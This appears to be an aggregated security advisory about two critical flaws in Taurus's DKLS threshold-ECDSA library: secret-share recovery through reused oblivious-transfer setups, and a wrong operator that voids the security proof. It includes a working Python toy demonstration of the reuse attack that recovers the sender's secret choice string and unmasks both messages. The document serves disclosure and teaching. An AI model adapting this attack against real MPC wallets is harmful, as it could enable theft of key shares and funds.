2024-11-25
Platform:
Taurus Multi-Party Signature Library
Version:
Not specified
Vulnerability:
1. Secret Share Recovery Attack
2. Invalid Security Proof due to Incorrect Operator
Severity:
Critical (both vulnerabilities)
Date:
November 24, 2024
What Undercode Says:
This blog post by Taurus HQ acknowledges two critical vulnerabilities in the library's implementation of the DKLS threshold ECDSA protocol.
1. Secret Share Recovery Attack: Reusing the base OT setup across protocol runs lets a malicious participant extract the other participant's secret share bit by bit until it is recovered entirely. This behaviour contradicts the comments in the code.
2. Invalid Security Proof: The 2018 DKLS paper contained a typographical error (a wrong operator) in the check-value computation of the OT extension protocol. The code implemented the formula as printed, so the published security proof does not apply to the code as written. No exploit is known, but the protocol's security guarantees no longer hold as claimed.
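Why a base-OT setup is one-time material can be seen in a toy IKNP-style OT extension. The Python below is an added illustration written for this summary, not code from the Taurus library or from the Coinbase report. It models the textbook probe in which a cheating receiver corrupts one column of the matrix it sends and learns one bit of the sender's base-OT choice string s from whether its own decryption still parses; with the setup reused, those bits accumulate across sessions until s is known and the receiver can unmask both sender messages, which in an OT-based multiplication means learning the other party's input. The consistency check a real OT extension adds (the check whose formula the second issue concerns) is omitted here; all sizes, names, and the zero-trailer message format are assumptions made for the demo.

```python
import hashlib
import secrets

# Toy IKNP-style OT extension, constructed for this page (not the library's code).
# Sizes are tiny for readability; real deployments use kappa >= 128.
KAPPA = 16    # number of base OTs = bit length of the sender's choice string s
M = 8         # extended OTs per session
MSG_LEN = 16  # message length in bytes; last 4 bytes are a zero trailer (assumed format)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def expand(seed: bytes, session_id: int, m: int) -> list:
    """PRG: expand a base-OT seed into m column bits, fresh for every session_id."""
    d = hashlib.sha256(seed + session_id.to_bytes(4, "big")).digest()
    return [(d[k >> 3] >> (k & 7)) & 1 for k in range(m)]  # needs m <= 256


def H(j: int, row: list) -> bytes:
    """Random-oracle pad for row j derived from the row's bits."""
    return hashlib.sha256(j.to_bytes(4, "big") + bytes(row)).digest()[:MSG_LEN]


def base_ot_setup(kappa: int = KAPPA) -> dict:
    """Base OTs with roles reversed: the extension receiver R holds both seeds of
    every column, the extension sender S holds its choice string s and the seeds
    it selected. s is the long-term secret that must never be reused."""
    seeds = [(secrets.token_bytes(16), secrets.token_bytes(16)) for _ in range(kappa)]
    s = [secrets.randbelow(2) for _ in range(kappa)]
    return {"R": seeds, "S": (s, [seeds[i][s[i]] for i in range(kappa)])}


def receiver_send(seeds, r, session_id, flip=None):
    """R with choice bits r sends U = T0 xor T1 xor r (column-wise) and keeps the
    rows t_j it will decrypt with. flip=(i, j) models a malicious R that corrupts
    column i on row j, which only changes the sender's row j pad if s_i = 1."""
    kappa, m = len(seeds), len(r)
    T0 = [expand(seeds[i][0], session_id, m) for i in range(kappa)]
    T1 = [expand(seeds[i][1], session_id, m) for i in range(kappa)]
    U = [[T0[i][j] ^ T1[i][j] ^ r[j] for j in range(m)] for i in range(kappa)]
    if flip is not None:
        U[flip[0]][flip[1]] ^= 1
    t_rows = [[T0[i][j] for i in range(kappa)] for j in range(m)]
    return U, t_rows


def sender_send(s, s_seeds, U, x_pairs, session_id):
    """S derives q_j = t_j xor r_j*s and masks (x0_j, x1_j) with H(j, q_j), H(j, q_j xor s)."""
    kappa, m = len(s), len(U[0])
    Q = [expand(s_seeds[i], session_id, m) for i in range(kappa)]
    for i in range(kappa):
        if s[i]:
            Q[i] = [Q[i][j] ^ U[i][j] for j in range(m)]
    out = []
    for j, (x0, x1) in enumerate(x_pairs):
        q = [Q[i][j] for i in range(kappa)]
        out.append((xor(x0, H(j, q)), xor(x1, H(j, [q[i] ^ s[i] for i in range(kappa)]))))
    return out


def receiver_recover(ys, t_rows, r):
    """Honest R: H(j, t_j) is the pad of exactly the message it chose."""
    return [xor(ys[j][r[j]], H(j, t_rows[j])) for j in range(len(r))]


def fresh_messages(m: int = M) -> list:
    """Constructed sender inputs: random bytes plus a zero trailer, standing in for
    the redundancy real protocol messages have (it lets R tell a good decryption from garbage)."""
    return [(secrets.token_bytes(MSG_LEN - 4) + bytes(4),
             secrets.token_bytes(MSG_LEN - 4) + bytes(4)) for _ in range(m)]


def looks_valid(msg: bytes) -> bool:
    return msg[-4:] == bytes(4)


def honest_session(setup, session_id: int = 0) -> bool:
    r = [secrets.randbelow(2) for _ in range(M)]
    xs = fresh_messages()
    U, t_rows = receiver_send(setup["R"], r, session_id)
    ys = sender_send(*setup["S"], U, xs, session_id)
    got = receiver_recover(ys, t_rows, r)
    return all(got[j] == xs[j][r[j]] for j in range(M))


def attack_with_reused_setup(setup) -> tuple:
    """Malicious R runs KAPPA sessions against the SAME base-OT setup. In session i
    it corrupts column i on row 0 and checks whether its own decryption of row 0 is
    still valid: it is iff s_i = 0. Fresh PRG expansion per session does not help,
    because s itself never changes. With s known, R then decrypts BOTH messages of
    a final session, which is exactly what OT must prevent."""
    seeds, (s_true, _) = setup["R"], setup["S"]
    s_guess = []
    for i in range(KAPPA):
        r = [0] * M
        U, t_rows = receiver_send(seeds, r, i, flip=(i, 0))
        ys = sender_send(*setup["S"], U, fresh_messages(), i)
        got = receiver_recover(ys, t_rows, r)
        s_guess.append(0 if looks_valid(got[0]) else 1)
    # final session with r_j = 0: q_j = t_j, so both pads H(j,t_j) and H(j,t_j xor s) are computable
    xs, r = fresh_messages(), [0] * M
    U, t_rows = receiver_send(seeds, r, KAPPA)
    ys = sender_send(*setup["S"], U, xs, KAPPA)
    both = [(xor(ys[j][0], H(j, t_rows[j])),
             xor(ys[j][1], H(j, [t_rows[j][i] ^ s_guess[i] for i in range(KAPPA)])))
            for j in range(M)]
    return s_guess == s_true, both == xs


if __name__ == "__main__":
    setup = base_ot_setup()
    print("honest session correct:", honest_session(setup))
    print("s recovered, both messages unmasked:", attack_with_reused_setup(setup))
```

A fresh setup per run makes every probe leak a bit of a secret that is discarded immediately afterwards; reuse is what turns the leaks into a recovery of s, and it is the sender-side consistency check, not the PRG, that is supposed to catch the corrupted column in the first place.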
Workarounds:
Do not reuse OT setups: run a fresh base OT setup for every protocol execution.
Avoid the current DKLS implementation until a patch is available; consider alternative solutions in the meantime.
Patch Status:
A patch is under development (branch otfix) but has not been merged because tests are failing. Taurus HQ is actively troubleshooting the issue.
Credits:
Coinbase researchers Yi-Hsiu Chen and Samuel Ranellucci are credited for discovering and reporting these vulnerabilities. Yehuda Lindell is acknowledged for coordinating the disclosure process.
References:
Reported By: Github.com